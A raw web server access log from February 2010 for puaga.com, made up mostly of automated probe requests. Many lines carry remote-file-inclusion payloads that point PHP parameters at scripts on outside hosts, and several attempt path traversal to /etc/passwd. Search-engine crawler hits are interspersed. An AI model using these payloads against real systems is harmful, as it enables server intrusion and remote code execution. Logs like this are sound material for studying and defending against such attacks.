213.189.224.16 - - [21/Feb/2010:07:40:06 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:40:16 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:40:16 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:40:16 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:41:55 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:41:57 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.250.198 - - [21/Feb/2010:07:42:01 -0800] "GET /logs/access_100210.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.102 - - [21/Feb/2010:07:42:26 -0800] "GET /logs/access_100130.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://www.ville-surylecomtal.fr/new/administrator/includes/id.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:43:22 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.115.111.242 - - [21/Feb/2010:07:44:12 -0800] "GET /orange_g/forum/index.php HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
208.115.111.242 - - [21/Feb/2010:07:44:13 -0800] "GET /orange_g/forum/viewtopic.php?p=25890 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
208.115.111.242 - - [21/Feb/2010:07:44:14 -0800] "GET /orange_g/forum/viewtopic.php?p=26507 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
208.115.111.242 - - [21/Feb/2010:07:44:14 -0800] "GET /orange_g/forum/viewtopic.php?p=27049 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
208.115.111.242 - - [21/Feb/2010:07:44:15 -0800] "GET /orange_g/forum/viewtopic.php?p=27441 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
208.115.111.242 - - [21/Feb/2010:07:44:16 -0800] "GET /orange_g/forum/viewtopic.php?p=28601 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "puaga.com"
213.189.224.16 - - [21/Feb/2010:07:44:39 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.70.33.151 - - [21/Feb/2010:07:46:47 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/spider.html;) Gecko/2008032620" "puaga.com"
213.189.224.16 - - [21/Feb/2010:07:46:55 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:47:50 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:47:54 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:47:54 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:47:55 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:48:17 -0800] "GET /become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:48:17 -0800] "GET /logs/access_100127.log//become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:48:17 -0800] "GET /logs/access_100203.log//become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:48:17 -0800] "GET /logs//become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
86.109.170.73 - - [21/Feb/2010:07:48:18 -0800] "GET /logs/access_100122.log%20%20//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.zeja.org/xpzmshxm//data/board/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:50:09 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.198.38 - - [21/Feb/2010:07:50:35 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
62.117.70.36 - - [21/Feb/2010:07:50:54 -0800] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:07:50:54 -0800] "GET /logs/access_100208.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:07:50:55 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:51:58 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:52:35 -0800] "GET /logs/access_100127.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.197.121.122 - - [21/Feb/2010:07:53:17 -0800] "GET /logs/access_100210.log/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:53:33 -0800] "GET /logs/access_100203.log%20%20//become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.85.1.152 - - [21/Feb/2010:07:53:38 -0800] "GET /logs/access_100127.log%20%20//become_editor.php?theme_path=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:54:41 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:54:41 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:54:41 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:07:54:43 -0800] "GET /module///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:54:43 -0800] "GET //board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:54:43 -0800] "GET /module/setup.php%20%20///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:54:46 -0800] "GET /module/setup.php%20%20///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:54:46 -0800] "GET /module///board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
58.150.99.144 - - [21/Feb/2010:07:54:47 -0800] "GET //board/bbs///setup.php?board_skin_path=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
67.195.111.172 - - [21/Feb/2010:07:54:48 -0800] "GET /logs/access_100121.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
67.195.111.172 - - [21/Feb/2010:07:54:48 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://www.puaga.com/logs/access_100121.log" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:56:05 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:56:05 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:56:05 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:57:25 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:57:25 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:57:25 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:57:47 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:57:47 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:57:47 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:58:18 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:58:18 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:58:18 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:58:34 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:58:34 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:58:34 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:59:23 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:59:23 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [21/Feb/2010:07:59:23 -0800] "GET /write_comment_update.php?board_skin_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:07:59:36 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:07:59:36 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:07:59:36 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:07:59:36 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:00:09 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:00:09 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:00:09 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:00:10 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:00:11 -0800] "GET /logs/access_100125.log%20%20//write_update.php?board_skin_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:00:12 -0800] "GET /write_update.php?board_skin_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.16.237.166 - - [21/Feb/2010:08:00:12 -0800] "GET /logs//write_update.php?board_skin_path=http://www.butterbeane.com/assets/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [21/Feb/2010:08:03:19 -0800] "GET /logs/access_100124.log/?_SERVER[DOCUMENT_ROOT]=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [21/Feb/2010:08:03:20 -0800] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [21/Feb/2010:08:03:20 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [21/Feb/2010:08:03:30 -0800] "GET /logs/access_100123.log/?_SERVER[DOCUMENT_ROOT]=http://feelcomz.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:04:18 -0800] "GET /logs/access_100217.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:04:18 -0800] "GET /logs/access_100118.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:04:42 -0800] "GET /logs/access_100118.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [21/Feb/2010:08:04:42 -0800] "GET /logs/access_100217.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.kpa.sc.kr////upload_data/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.38 - - [21/Feb/2010:08:05:29 -0800] "GET /write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.38 - - [21/Feb/2010:08:05:30 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.38 - - [21/Feb/2010:08:05:32 -0800] "GET /logs/access_100121.log%20%20//write_comment_update.php/?board_skin_path=http://felcomz.fileave.com/ld1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:06:03 -0800] "GET /login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:06:03 -0800] "GET /logs//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:06:03 -0800] "GET /logs/access_100206.log%20%20//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:06:24 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:07:31 -0800] "GET /logs/access_100121.log/index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:07:32 -0800] "GET /index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 200 3626 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:07:32 -0800] "GET /logs/index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:07:32 -0800] "GET /logs/access_100109.log/index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
64.182.41.225 - - [21/Feb/2010:08:09:16 -0800] "GET /logs/access_100204.log/index.php?pilih=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
116.40.122.117 - - [21/Feb/2010:08:09:58 -0800] "GET /logs/access_100121.log%20%20/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [21/Feb/2010:08:09:58 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.40.122.117 - - [21/Feb/2010:08:10:00 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:08:10:32 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:08:10:32 -0800] "GET /logs/access_100115.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:08:10:32 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:08:10:42 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [21/Feb/2010:08:10:42 -0800] "GET /logs/access_100115.log%20%20/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.import-et-export.fr//components/com_virtuemart/rs1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:11:35 -0800] "GET /login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:11:35 -0800] "GET /logs//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:11:35 -0800] "GET /logs/access_100206.log%20%20//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:11:52 -0800] "GET /bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:11:52 -0800] "GET /logs//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [21/Feb/2010:08:11:52 -0800] "GET /logs/access.log%20%20//bbs///////delete_comment.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [21/Feb/2010:08:13:03 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [21/Feb/2010:08:14:18 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [21/Feb/2010:08:14:18 -0800] "GET /logs/access_100204.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [21/Feb/2010:08:14:18 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [21/Feb/2010:08:14:18 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.114.36 - - [21/Feb/2010:08:16:27 -0800] "GET /ideal/?D=A HTTP/1.0" 200 508 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
